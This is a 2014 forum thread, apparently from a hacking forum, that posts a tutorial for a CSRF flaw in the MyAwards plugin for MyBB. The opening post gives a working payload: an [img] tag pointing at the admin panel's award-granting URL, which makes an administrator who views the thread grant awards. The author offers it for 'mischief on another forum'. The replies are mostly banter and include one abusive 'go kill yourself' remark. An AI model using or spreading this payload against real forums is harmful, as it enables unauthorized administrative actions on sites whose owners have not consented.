chevron_left chevron_right
Login Register invert_colors photo_library
Thread Rating:
  • 0 Vote(s) - 0 Average


filter_list Tutorial MyBB - MyAwards CSRF Vulnerability
Author
Message
MyBB - MyAwards CSRF Vulnerability #1
This is a really simple, really stupid, vulnerability I heard of a few days ago. Didn't think it was worth a post, until I received a dozen PMs that we were possibly "vulnerable". Felt like sharing, in case you guys want to cause a bunch of mischief on another forum.

  1. Figure out the ACP link for a MyBB forum using MyAwards.
  2. Post a thread with the following image code on a (modified to your needs).
    Code:
    [img]https://www.sinister.ly/admin/index.php?module=user-awards&action=awards_do_grant&awid=4&username=Oni&awreason=loldongs[/img]
  3. Wait for an administrator to view your "image".
  4. Enjoy whatever pathetic awards you might want.
[Image: 7ajmN5P.jpg]


Skype: oni_sl (Add)
Steam: Oni | SL (Add)

[+] 2 users Like Oni's post
Reply

RE: MyBB - MyAwards CSRF Vulnerability #2
Wow oni, I now see why you gave yourself that grey hat hacker award!

Reply

RE: MyBB - MyAwards CSRF Vulnerability #3
I guess you fixed this on here, right? Tongue
[Image: CDUAq9d.png]

Reply

RE: MyBB - MyAwards CSRF Vulnerability #4
This is pretty funny, I gotta say.
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47

Reply

RE: MyBB - MyAwards CSRF Vulnerability #5
(08-26-2014, 05:21 AM).Shebang Wrote: I guess you fixed this on here, right? Tongue

Would be pretty dumb if he wouldn't, mh? Tongue

Reply

RE: MyBB - MyAwards CSRF Vulnerability #6
(08-26-2014, 05:21 AM).Shebang Wrote: I guess you fixed this on here, right? Tongue

I was imagining someone with over 20 awards on SL as you said that :p

Reply

RE: MyBB - MyAwards CSRF Vulnerability #7
Fun fact; you can give yourself invalid awards (if you know the admin dir)

Hope you had fun removing those awards, @Oni. Tongue

Reply

RE: MyBB - MyAwards CSRF Vulnerability #8
(09-24-2014, 02:58 AM)Equinox Wrote: Fun fact; you can give yourself invalid awards (if you know the admin dir)

Hope you had fun removing those awards, @Oni. Tongue

You can go kill yourself.
[Image: 7ajmN5P.jpg]


Skype: oni_sl (Add)
Steam: Oni | SL (Add)

Reply

RE: MyBB - MyAwards CSRF Vulnerability #9
LOL This is awesome! Great share, hahaha!
TTTEEEXXXAAASSS

[Image: cdb723621852c30db3f11ea7e179d595.png]

Reply

RE: MyBB - MyAwards CSRF Vulnerability #10
(09-24-2014, 02:59 AM)Oni Wrote: You can go kill yourself.

no bulli allowed!

Reply






Users browsing this thread: 1 Guest(s)